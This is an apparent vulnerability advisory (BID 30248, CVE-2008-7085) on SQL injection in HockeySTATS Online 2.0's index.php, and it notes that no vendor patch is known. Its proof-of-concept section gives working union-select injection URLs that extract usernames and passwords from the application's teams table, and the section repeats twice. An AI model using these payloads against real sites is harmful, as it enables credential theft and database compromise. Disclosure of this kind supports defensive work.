HockeySTATS Online 'index.php' Multiple SQL Injection Vulnerabilities
BID:30248
Info
HockeySTATS Online 'index.php' Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 30248 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-7085 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 16 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | Mr.SQL <[email protected]> |
| Vulnerable: |
TheHockeyStop HockeySTATS Online Basic 2.0 TheHockeyStop HockeySTATS Online Advanced 2.0 |
| Not Vulnerable: | |
Discussion
HockeySTATS Online 'index.php' Multiple SQL Injection Vulnerabilities
HockeySTATS Online is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
HockeySTATS Online Basic and Advanced 2.0 are vulnerable; other versions may also be affected.
HockeySTATS Online is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
HockeySTATS Online Basic and Advanced 2.0 are vulnerable; other versions may also be affected.
Exploit / POC
HockeySTATS Online 'index.php' Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
www.example.com/hstatsbasic/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
www.example.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*
www.example.com/hockeystats/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
www.example.com/hockeystats/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
www.example.com/hstatsbasic/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
www.example.com/hstatsbasic/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*
www.example.com/hockeystats/?opt=viewpage&type=html&id=-00002'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL,0,0,0,0,0+from+teams/*
www.example.com/hockeystats/index.php?opt=schedule&season=1&divid=-1'+union+select+0,CONCAT_WS(0x3a3a,username,password)MrSQL+from+teams/*
Solution / Fix
HockeySTATS Online 'index.php' Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
HockeySTATS Online 'index.php' Multiple SQL Injection Vulnerabilities
References:
References:
- Vendor Homepage (TheHockeyStop)